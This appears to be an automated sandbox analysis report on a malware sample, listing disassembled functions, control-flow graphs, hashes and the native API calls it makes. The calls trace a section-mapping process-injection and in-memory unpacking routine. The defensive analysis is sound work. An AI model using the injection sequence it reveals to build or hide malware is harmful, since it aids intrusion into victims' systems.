                                                                                                                                        control_flow_graph 85 4014fb-401504 86 40151b 85->86 87 40150c-40152e 85->87 86->87 92 401531-401545 call 40127e 87->92 97 40154a-401555 92->97 97->97 98 401558-40155a 97->98 99 40155d-401572 98->99 102 401574-401579 99->102 104 4015c4 102->104 105 40157b 102->105 106 4015c6 104->106 107 40162f-401632 104->107 108 4015f6-4015f8 105->108 109 40157d-40159a 105->109 106->102 110 4015c8-4015cd 106->110 111 401634-401659 call 40127e 107->111 112 4016a5-4016a6 107->112 119 40159d 109->119 120 40152f-401530 109->120 115 401648-401659 110->115 116 4015cf-4015d0 110->116 126 40165b 111->126 127 40165e-401663 111->127 117 4016a7-4016a9 112->117 118 40162d 112->118 115->126 115->127 124 4015d2-4015e8 116->124 125 4015b6-4015b9 116->125 122 401987 117->122 123 4016af-4016c6 NtDuplicateObject 117->123 118->107 119->99 128 40159f-4015a1 119->128 120->92 129 401996-4019dd call 40127e 122->129 123->122 131 4016cc-4016f0 NtCreateSection 123->131 133 4015ea-4015f5 124->133 134 40157c 124->134 125->111 130 4015bb-4015c3 125->130 126->127 148 401989-401991 127->148 149 401669-40167a 127->149 135 4015a3 128->135 136 40161c 128->136 130->104 138 4016f2-401713 NtMapViewOfSection 131->138 139 40174c-401772 NtCreateSection 131->139 133->108 134->109 141 4015a9-4015b4 134->141 143 40161e-40162c 135->143 144 4015a5-4015a6 135->144 136->143 138->139 146 401715-401731 NtMapViewOfSection 138->146 139->122 147 401778-40177c 139->147 141->125 143->111 152 401643 143->152 144->141 146->139 153 401733-401749 146->153 147->122 154 401782-4017a3 NtMapViewOfSection 147->154 148->127 148->129 149->122 162 401680-4016a3 149->162 152->111 153->139 154->122 156 4017a9-4017c5 NtMapViewOfSection 154->156 156->122 161 4017cb call 4017d0 156->161 162->117
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                                                                                        • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                                                                                                        • Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                                                                                        • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A
                                                                                                                                        Function 004015FB Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 171 4015fb-401604 172 401615 171->172 173 40160b-401611 171->173 172->173 174 401618-40162c 172->174 173->174 178 401643 174->178 179 401634-401659 call 40127e 174->179 178->179 184 40165b 179->184 185 40165e-401663 179->185 184->185 187 401989-401991 185->187 188 401669-40167a 185->188 187->185 191 401996-4019dd call 40127e 187->191 192 401680-4016a9 188->192 193 401987 188->193 192->193 200 4016af-4016c6 NtDuplicateObject 192->200 193->191 200->193 202 4016cc-4016f0 NtCreateSection 200->202 204 4016f2-401713 NtMapViewOfSection 202->204 205 40174c-401772 NtCreateSection 202->205 204->205 207 401715-401731 NtMapViewOfSection 204->207 205->193 208 401778-40177c 205->208 207->205 210 401733-401749 207->210 208->193 212 401782-4017a3 NtMapViewOfSection 208->212 210->205 212->193 214 4017a9-4017c5 NtMapViewOfSection 212->214 214->193 217 4017cb call 4017d0 214->217
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                                        • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                                                                                                        • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                                        • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64
                                                                                                                                        Function 00401613 Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 219 401613-40162c 223 401643 219->223 224 401634-401659 call 40127e 219->224 223->224 229 40165b 224->229 230 40165e-401663 224->230 229->230 232 401989-401991 230->232 233 401669-40167a 230->233 232->230 236 401996-4019dd call 40127e 232->236 237 401680-4016a9 233->237 238 401987 233->238 237->238 245 4016af-4016c6 NtDuplicateObject 237->245 238->236 245->238 247 4016cc-4016f0 NtCreateSection 245->247 249 4016f2-401713 NtMapViewOfSection 247->249 250 40174c-401772 NtCreateSection 247->250 249->250 252 401715-401731 NtMapViewOfSection 249->252 250->238 253 401778-40177c 250->253 252->250 255 401733-401749 252->255 253->238 257 401782-4017a3 NtMapViewOfSection 253->257 255->250 257->238 259 4017a9-4017c5 NtMapViewOfSection 257->259 259->238 262 4017cb call 4017d0 259->262
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                                        • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                                                                                                        • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                                        • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64
                                                                                                                                        Function 00401606 Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 264 401606-401607 264->264 265 401609 264->265 266 40160b-40162c 265->266 267 40163c-401659 call 40127e 265->267 277 401643 266->277 278 401634-401639 266->278 275 40165b 267->275 276 40165e-401663 267->276 275->276 280 401989-401991 276->280 281 401669-40167a 276->281 277->278 278->267 280->276 284 401996-4019dd call 40127e 280->284 285 401680-4016a9 281->285 286 401987 281->286 285->286 293 4016af-4016c6 NtDuplicateObject 285->293 286->284 293->286 295 4016cc-4016f0 NtCreateSection 293->295 297 4016f2-401713 NtMapViewOfSection 295->297 298 40174c-401772 NtCreateSection 295->298 297->298 300 401715-401731 NtMapViewOfSection 297->300 298->286 301 401778-40177c 298->301 300->298 303 401733-401749 300->303 301->286 305 401782-4017a3 NtMapViewOfSection 301->305 303->298 305->286 307 4017a9-4017c5 NtMapViewOfSection 305->307 307->286 310 4017cb call 4017d0 307->310
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1652636561-0
                                                                                                                                        • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                                        • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                                                                                                        • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                                        • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64
                                                                                                                                        Function 00401627 Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 312 401627-40162c 316 401643 312->316 317 401634-401659 call 40127e 312->317 316->317 322 40165b 317->322 323 40165e-401663 317->323 322->323 325 401989-401991 323->325 326 401669-40167a 323->326 325->323 329 401996-4019dd call 40127e 325->329 330 401680-4016a9 326->330 331 401987 326->331 330->331 338 4016af-4016c6 NtDuplicateObject 330->338 331->329 338->331 340 4016cc-4016f0 NtCreateSection 338->340 342 4016f2-401713 NtMapViewOfSection 340->342 343 40174c-401772 NtCreateSection 340->343 342->343 345 401715-401731 NtMapViewOfSection 342->345 343->331 346 401778-40177c 343->346 345->343 348 401733-401749 345->348 346->331 350 401782-4017a3 NtMapViewOfSection 346->350 348->343 350->331 352 4017a9-4017c5 NtMapViewOfSection 350->352 352->331 355 4017cb call 4017d0 352->355
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                                                                                                        • Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
                                                                                                                                        • Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                                                                                                        • Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64
                                                                                                                                        Function 00401641 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 357 401641-401659 call 40127e 364 40165b 357->364 365 40165e-401663 357->365 364->365 367 401989-401991 365->367 368 401669-40167a 365->368 367->365 371 401996-4019dd call 40127e 367->371 372 401680-4016a9 368->372 373 401987 368->373 372->373 380 4016af-4016c6 NtDuplicateObject 372->380 373->371 380->373 382 4016cc-4016f0 NtCreateSection 380->382 384 4016f2-401713 NtMapViewOfSection 382->384 385 40174c-401772 NtCreateSection 382->385 384->385 387 401715-401731 NtMapViewOfSection 384->387 385->373 388 401778-40177c 385->388 387->385 390 401733-401749 387->390 388->373 392 401782-4017a3 NtMapViewOfSection 388->392 390->385 392->373 394 4017a9-4017c5 NtMapViewOfSection 392->394 394->373 397 4017cb call 4017d0 394->397
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                                                        • Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
                                                                                                                                        • Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                                                        • Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64
                                                                                                                                        Function 00403103 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 399 403103-403127 400 403246-40324b 399->400 401 40312d-403145 399->401 401->400 402 40314b-40315c 401->402 403 40315e-403167 402->403 404 40316c-40317a 403->404 404->404 405 40317c-403183 404->405 406 4031a5-4031ac 405->406 407 403185-4031a4 405->407 408 4031ce-4031d1 406->408 409 4031ae-4031cd 406->409 407->406 410 4031d3-4031d6 408->410 411 4031da 408->411 409->408 410->411 412 4031d8 410->412 411->403 413 4031dc-4031e1 411->413 412->413 413->400 414 4031e3-4031e6 413->414 414->400 415 4031e8-403243 RtlCreateUserThread NtTerminateProcess 414->415 415->400
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1921587553-0
                                                                                                                                        • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                                        • Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
                                                                                                                                        • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                                        • Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5
                                                                                                                                        Function 00403257 Relevance: 3.1, APIs: 2, Instructions: 83nativethreadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 417 403257-40325f 418 4031f0-403243 RtlCreateUserThread NtTerminateProcess 417->418 419 403261-40327f 417->419 420 403246-40324b 418->420 425 403281 419->425 426 403286-403290 419->426 425->426 427 403283-403285 425->427 428 403292 426->428 429 403298-4032ba call 4012ec 426->429 427->426 428->429 430 403293-403297 428->430 435 4032be 429->435 435->435
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1921587553-0
                                                                                                                                        • Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                                                        • Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
                                                                                                                                        • Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                                                        • Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B
                                                                                                                                        Function 01FA003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 1fa003c-1fa0047 1 1fa0049 0->1 2 1fa004c-1fa0263 call 1fa0a3f call 1fa0e0f call 1fa0d90 VirtualAlloc 0->2 1->2 17 1fa028b-1fa0292 2->17 18 1fa0265-1fa0289 call 1fa0a69 2->18 20 1fa02a1-1fa02b0 17->20 21 1fa02ce-1fa03c2 VirtualProtect call 1fa0cce call 1fa0ce7 18->21 20->21 22 1fa02b2-1fa02cc 20->22 29 1fa03d1-1fa03e0 21->29 22->20 30 1fa0439-1fa04b8 VirtualFree 29->30 31 1fa03e2-1fa0437 call 1fa0ce7 29->31 33 1fa04be-1fa04cd 30->33 34 1fa05f4-1fa05fe 30->34 31->29 38 1fa04d3-1fa04dd 33->38 35 1fa077f-1fa0789 34->35 36 1fa0604-1fa060d 34->36 42 1fa078b-1fa07a3 35->42 43 1fa07a6-1fa07b0 35->43 36->35 39 1fa0613-1fa0637 36->39 38->34 41 1fa04e3-1fa0505 38->41 46 1fa063e-1fa0648 39->46 50 1fa0517-1fa0520 41->50 51 1fa0507-1fa0515 41->51 42->43 44 1fa086e-1fa08be LoadLibraryA 43->44 45 1fa07b6-1fa07cb 43->45 55 1fa08c7-1fa08f9 44->55 48 1fa07d2-1fa07d5 45->48 46->35 49 1fa064e-1fa065a 46->49 52 1fa07d7-1fa07e0 48->52 53 1fa0824-1fa0833 48->53 49->35 54 1fa0660-1fa066a 49->54 58 1fa0526-1fa0547 50->58 51->58 59 1fa07e2 52->59 60 1fa07e4-1fa0822 52->60 62 1fa0839-1fa083c 53->62 61 1fa067a-1fa0689 54->61 56 1fa08fb-1fa0901 55->56 57 1fa0902-1fa091d 55->57 56->57 63 1fa054d-1fa0550 58->63 59->53 60->48 64 1fa068f-1fa06b2 61->64 65 1fa0750-1fa077a 61->65 62->44 66 1fa083e-1fa0847 62->66 68 1fa05e0-1fa05ef 63->68 69 1fa0556-1fa056b 63->69 70 1fa06ef-1fa06fc 64->70 71 1fa06b4-1fa06ed 64->71 65->46 72 1fa084b-1fa086c 66->72 73 1fa0849 66->73 68->38 74 1fa056f-1fa057a 69->74 75 1fa056d 69->75 76 1fa074b 70->76 77 1fa06fe-1fa0748 70->77 71->70 72->62 73->44 78 1fa059b-1fa05bb 74->78 79 1fa057c-1fa0599 74->79 75->68 76->61 77->76 84 1fa05bd-1fa05db 78->84 79->84 84->63
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01FA024D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2576079643.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_1fa0000_hdhruer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                        • Instruction ID: 2986c96ea02455e376ab3f8f91fd8668def29363e1ec19eb6efd90f862458d90
                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                        • Instruction Fuzzy Hash: 835289B5A00229DFDB64CF58D984BACBBB1BF09304F5480D9E94DAB351DB35AA84CF14
                                                                                                                                        Function 004B239D Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 436 4b239d-4b23b6 437 4b23b8-4b23ba 436->437 438 4b23bc 437->438 439 4b23c1-4b23cd CreateToolhelp32Snapshot 437->439 438->439 440 4b23cf-4b23d5 439->440 441 4b23dd-4b23ea Module32First 439->441 440->441 447 4b23d7-4b23db 440->447 442 4b23ec-4b23ed call 4b205c 441->442 443 4b23f3-4b23fb 441->443 448 4b23f2 442->448 447->437 447->441 448->443
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004B23C5
                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 004B23E5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2574353685.00000000004A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_4a0000_hdhruer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction ID: f12833529483d4ba3cca70eb428bc7606b885c612647e918719144ba3a1f2c72
                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction Fuzzy Hash: 85F0C232100315ABD7203BF5A98CAAB72E8BF49324F10152AEA42D11C0CAF8EC458675
                                                                                                                                        Function 01FA0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 449 1fa0e0f-1fa0e24 SetErrorMode * 2 450 1fa0e2b-1fa0e2c 449->450 451 1fa0e26 449->451 451->450
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,01FA0223,?,?), ref: 01FA0E19
                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,01FA0223,?,?), ref: 01FA0E1E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2576079643.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_1fa0000_hdhruer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                        • Instruction ID: cb8a2fa6b6314028a024efa7a5c923e9ca64f27433e393fd74be4ccb9015de38
                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                        • Instruction Fuzzy Hash: 44D01231545128B7DB002A94DC09BCD7F1CDF09B62F408011FB0DD9080CB75954046E5
                                                                                                                                        Function 004019C0 Relevance: 1.3, APIs: 1, Instructions: 68sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 452 4019c0-4019c6 453 4019e7-401a10 452->453 454 4019c8-4019dd call 40127e 452->454 462 401a13-401a46 call 40127e Sleep call 4014fb 453->462 463 401a09-401a0c 453->463 471 401a55-401a5b 462->471 472 401a48-401a50 call 4015fb 462->472 463->462 475 401a60-401a65 471->475 476 401a69 471->476 472->471 477 401a6c-401a9a call 40127e 475->477 476->475 476->477
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.2572905300.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_hdhruer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                        • Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                                                                                                        • Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
